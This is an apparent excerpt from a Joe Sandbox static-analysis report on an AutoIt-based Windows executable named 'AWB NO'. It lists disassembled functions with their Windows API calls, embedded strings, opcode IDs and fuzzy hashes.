                                                              • Opcode Fuzzy Hash: 6f0489881310945f92dee3f97a2ff10f2881b7c0a52752e23ccb045f92862502
                                                              • Instruction Fuzzy Hash: DD316E31105115AFDF11AF64DC08FDF3B69EF49324F210A29FA15A61A0D739E815DBA8
                                                              Function 0046D7F8 Relevance: 16.8, APIs: 11, Instructions: 283comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32(00000000), ref: 0046D855
                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0046D8E8
                                                              • SHGetDesktopFolder.SHELL32(?), ref: 0046D8FC
                                                              • CoCreateInstance.OLE32(00492D7C,00000000,00000001,004BA89C,?), ref: 0046D948
                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0046D9B7
                                                              • CoTaskMemFree.OLE32(?,?), ref: 0046DA0F
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0046DA88
                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0046DAAB
                                                              • CoTaskMemFree.OLE32(00000000), ref: 0046DAB2
                                                              • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0046DAE9
                                                              • CoUninitialize.OLE32(00000001,00000000), ref: 0046DAEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                              • String ID:
                                                              • API String ID: 2762341140-0
                                                              • Opcode ID: dd73fdc4102ad2637eaa046372693309bf55b1b86de4675c531d5fb3936c7524
                                                              • Instruction ID: e15dc4ec29765f5d13c7e8e8e870c09580055c4dc4ade826e40e2e41e7fdb704
                                                              • Opcode Fuzzy Hash: dd73fdc4102ad2637eaa046372693309bf55b1b86de4675c531d5fb3936c7524
                                                              • Instruction Fuzzy Hash: ECB11C75A00108AFDB04DFA5C888DAEBBF9FF48304B14846AF805EB261DB34ED45CB55
                                                              Function 0045710E Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00457135
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 0045718E
                                                              • VariantInit.OLEAUT32(?), ref: 004571A0
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004571C0
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00457213
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00457227
                                                              • VariantClear.OLEAUT32(?), ref: 0045723C
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00457249
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00457252
                                                              • VariantClear.OLEAUT32(?), ref: 00457264
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0045726F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              • Opcode ID: 94a2adc6563c5264710b055ecbef086df5183bcefbc423f1cd2a25837ac14fec
                                                              • Instruction ID: ee6ff97d49ab8f9c2dd167b55ca35aa0841007d9f21f2d6d7be11d351e1905ac
                                                              • Opcode Fuzzy Hash: 94a2adc6563c5264710b055ecbef086df5183bcefbc423f1cd2a25837ac14fec
                                                              • Instruction Fuzzy Hash: 61416031A00119AFCB00DFA9D8449AEBBB9FF18755F00847EF955E7362CB34A949CB94
                                                              Function 00406BEC Relevance: 16.2, APIs: 2, Strings: 7, Instructions: 478COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00420B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406C6C,?,00008000), ref: 00420BB7
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406D0D
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00406E5A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$FullNamePath
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 1801377286-1018226102
                                                              • Opcode ID: 5db1c07156f0eda4e46257f76887aa10a87e20475b84edb426b3c93bdfbea0b3
                                                              • Instruction ID: 1e1e50465060d2d049cdecd8729963b67a53d0d5fc41c37d224936f91734444f
                                                              • Opcode Fuzzy Hash: 5db1c07156f0eda4e46257f76887aa10a87e20475b84edb426b3c93bdfbea0b3
                                                              • Instruction Fuzzy Hash: DB0272705083419FC714EF25C8419AFBBE5AF98318F14492EF486A72A1DB38D949CB5B
                                                              Function 004786D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoInitialize.OLE32 ref: 00478718
                                                              • CoUninitialize.OLE32 ref: 00478723
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 00478783
                                                              • IIDFromString.OLE32(?,?), ref: 004787F6
                                                              • VariantInit.OLEAUT32(?), ref: 00478890
                                                              • VariantClear.OLEAUT32(?), ref: 004788F1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 636576611-1287834457
                                                              • Opcode ID: 2066ecad24d456d9f346359fa3de5c2bd65283e41aae969702f99653fed73123
                                                              • Instruction ID: 83a2d69f67766b6968c6c0da92f2a013d8975f3f82f5255262cd81a9dced9d59
                                                              • Opcode Fuzzy Hash: 2066ecad24d456d9f346359fa3de5c2bd65283e41aae969702f99653fed73123
                                                              • Instruction Fuzzy Hash: ED61B4706443019FD710EF65C848B9BBBE4AF44714F10881EF9899B291DB78ED48CB9B
                                                              Function 0046AB12 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 183COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046AB76
                                                              • GetDriveTypeW.KERNEL32(00000061,004BA620,00000061), ref: 0046AC40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2426244813-1000479233
                                                              • Opcode ID: f11e21cc367225389e3b12a59c8de5b1ce20c7d35fd854b14e694dbf74953bce
                                                              • Instruction ID: 2da2c5fdb05bccb69e07a9cf036721a3c430aae2bfda7f725a790937263b16ab
                                                              • Opcode Fuzzy Hash: f11e21cc367225389e3b12a59c8de5b1ce20c7d35fd854b14e694dbf74953bce
                                                              • Instruction Fuzzy Hash: 3D51A1302183019BC710EF15C881AAFB7A5EF85708F54482FF585672E2EB39ED19CA5B
                                                              Function 004646D6 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004646E8
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0046470E
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464784
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: FileInfoVersion$QuerySizeValue
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 2179348866-1459072770
                                                              • Opcode ID: f926f23987d17edeb2c10f7a7caac8026826ee7cbbd462b984d162270400232f
                                                              • Instruction ID: f88f6bb759531ccf8b0359daaa379e531abbb6c583277710136eab8ff515ad19
                                                              • Opcode Fuzzy Hash: f926f23987d17edeb2c10f7a7caac8026826ee7cbbd462b984d162270400232f
                                                              • Instruction Fuzzy Hash: 354117326002147ADB14BA65AD42EBF77ACDF81714F50006FF804A6182FB6C9A0197BE
                                                              Function 00475A45 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00475AA6
                                                              • inet_addr.WSOCK32(?,?,?), ref: 00475AEB
                                                              • gethostbyname.WSOCK32(?), ref: 00475AF7
                                                              • IcmpCreateFile.IPHLPAPI ref: 00475B05
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475B75
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475B8B
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00475C00
                                                              • WSACleanup.WSOCK32 ref: 00475C06
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              • Opcode ID: 5df4ffb80b1c4233f36543e9ea3ce9ed50dbd4ff81629453d9346ef347d12554
                                                              • Instruction ID: b1956d064655379944453726357a5f8492723158f504fb124a286c6b6697773e
                                                              • Opcode Fuzzy Hash: 5df4ffb80b1c4233f36543e9ea3ce9ed50dbd4ff81629453d9346ef347d12554
                                                              • Instruction Fuzzy Hash: 10517D316047009FD710AF25C849B6AB7E4EF48714F14892EF959EB2E1DBB8EC049B4A
                                                              Function 0046A0B5 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 156COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadStringW.USER32(00000066,?,00000FFF,0048FB78), ref: 0046A0FC
                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0046A11E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: LoadString
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%I
                                                              • API String ID: 2948472770-1791166345
                                                              • Opcode ID: 0f32151a1d078933929183b590cd5786a8a20df29cfef2b2fa63dfdab3a7568f
                                                              • Instruction ID: 1303775e7231178a658396c91acb0fa552fc501cd72ad3af750fbe55f2e9d174
                                                              • Opcode Fuzzy Hash: 0f32151a1d078933929183b590cd5786a8a20df29cfef2b2fa63dfdab3a7568f
                                                              • Instruction Fuzzy Hash: E9516171940509AACF15EBA1CD42EEEB779AF04304F1041BAF505721A1EB396F58CFAA
                                                              Function 004873C1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 103windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateMenu.USER32 ref: 004873F4
                                                              • SetMenu.USER32(?,00000000), ref: 00487403
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487490
                                                              • IsMenu.USER32(?), ref: 004874A6
                                                              • CreatePopupMenu.USER32 ref: 004874B0
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004874DD
                                                              • DrawMenuBar.USER32 ref: 004874E5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                              • String ID: 0$F
                                                              • API String ID: 161812096-3044882817
                                                              • Opcode ID: 52c22e23c74f252828f5091ec4f41fccbfb650d377574ec2eca5ca95968dfe7a
                                                              • Instruction ID: 469fb1be4590f9541f2c80e88f17ef0f5a107e94f682755a56fb5537772b2935
                                                              • Opcode Fuzzy Hash: 52c22e23c74f252828f5091ec4f41fccbfb650d377574ec2eca5ca95968dfe7a
                                                              • Instruction Fuzzy Hash: 08415874A01205EFDB10EF64D898E9EBBB9FF49300F24482AED55A7361D734A914CF68
                                                              Function 0046B72E Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B73B
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B7B1
                                                              • GetLastError.KERNEL32 ref: 0046B7BB
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B828
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              • Opcode ID: b7d98a3523c8d12a034a43699458ae4a5e0a40e46a29aa2f73c550c60f36c37a
                                                              • Instruction ID: 6ede0cc1e191cf7e64ce4b8d34fa7c18aa343ebc901c05dbf6b98b02cbe7136c
                                                              • Opcode Fuzzy Hash: b7d98a3523c8d12a034a43699458ae4a5e0a40e46a29aa2f73c550c60f36c37a
                                                              • Instruction Fuzzy Hash: AC31B435A002059FCB10EF64CC85AEEBBB8FF44705F10402BE501E7291EB799D86CB9A
                                                              Function 00459471 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004594F6
                                                              • GetDlgCtrlID.USER32 ref: 00459501
                                                              • GetParent.USER32 ref: 0045951D
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459520
                                                              • GetDlgCtrlID.USER32(?), ref: 00459529
                                                              • GetParent.USER32(?), ref: 00459545
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459548
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 2573188126-1403004172
                                                              • Opcode ID: 3b5ce9582cec51f2b13cbe64a6ea9141346c4d1aa319f9b4422a12efa800192d
                                                              • Instruction ID: 5a15aa317080d2b3577eb6715e6aca48c40ccb9cf262568b84f0d4fa34887e47
                                                              • Opcode Fuzzy Hash: 3b5ce9582cec51f2b13cbe64a6ea9141346c4d1aa319f9b4422a12efa800192d
                                                              • Instruction Fuzzy Hash: 2321C771900108BBCF059B65CC85DFEB774EF49300F50012AF961672E2EB79591DDB28
                                                              Function 0045955C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004595DF
                                                              • GetDlgCtrlID.USER32 ref: 004595EA
                                                              • GetParent.USER32 ref: 00459606
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459609
                                                              • GetDlgCtrlID.USER32(?), ref: 00459612
                                                              • GetParent.USER32(?), ref: 0045962E
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459631
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 2573188126-1403004172
                                                              • Opcode ID: 7f4d7e136411d8ffd2be00e42e0ad5e5652d26d453814e1b762a92fc3febef17
                                                              • Instruction ID: fb1d478c1ab3bfee17ee4a3591baa8024a25a188b4548720a9553176f8a39507
                                                              • Opcode Fuzzy Hash: 7f4d7e136411d8ffd2be00e42e0ad5e5652d26d453814e1b762a92fc3febef17
                                                              • Instruction Fuzzy Hash: AC21CB75940108BBDF019B61CC85EFEB778EF48300F50012AF911A72E2EB79591EDB28
                                                              Function 00462A16 Relevance: 15.2, APIs: 10, Instructions: 190windowsleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(004C6890,000000FF,00000000,00000030), ref: 00462A92
                                                              • SetMenuItemInfoW.USER32(004C6890,00000004,00000000,00000030), ref: 00462AC8
                                                              • Sleep.KERNEL32(000001F4), ref: 00462ADA
                                                              • GetMenuItemCount.USER32(?), ref: 00462B1E
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00462B3A
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00462B64
                                                              • GetMenuItemID.USER32(?,?), ref: 00462BA9
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462BEF
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462C03
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462C24
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                              • String ID:
                                                              • API String ID: 1460738036-0
                                                              • Opcode ID: 638b7d30cc1c27bdbe2d4b3278922b6b7190dbed23476bfa5db6d6130c3c592a
                                                              • Instruction ID: 18a65889ef34665f5b2b5336e4e6eed4a99801a903535dc72d9624464193ca63
                                                              • Opcode Fuzzy Hash: 638b7d30cc1c27bdbe2d4b3278922b6b7190dbed23476bfa5db6d6130c3c592a
                                                              • Instruction Fuzzy Hash: 6461D4B0900649BFDB21CF54CE88DBF7BB8EB41704F14446EE841A7251E7B9AD05DB2A
                                                              Function 00487192 Relevance: 15.2, APIs: 10, Instructions: 184windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00487214
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00487217
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048723B
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0048725E
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004872D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow
                                                              • String ID:
                                                              • API String ID: 312131281-0
                                                              • Opcode ID: 7c0549792cb58a85db63f83a94352240f63381d44f9194f46865063892b0a211
                                                              • Instruction ID: 92033519db1ee425eec29857b32d50f63e453e63508eb3b516053c7f4a854d7f
                                                              • Opcode Fuzzy Hash: 7c0549792cb58a85db63f83a94352240f63381d44f9194f46865063892b0a211
                                                              • Instruction Fuzzy Hash: 83618D75900208AFDB10EFA4CC81EEE77F8EF09704F24456AFA14A73A1D774A945DB68
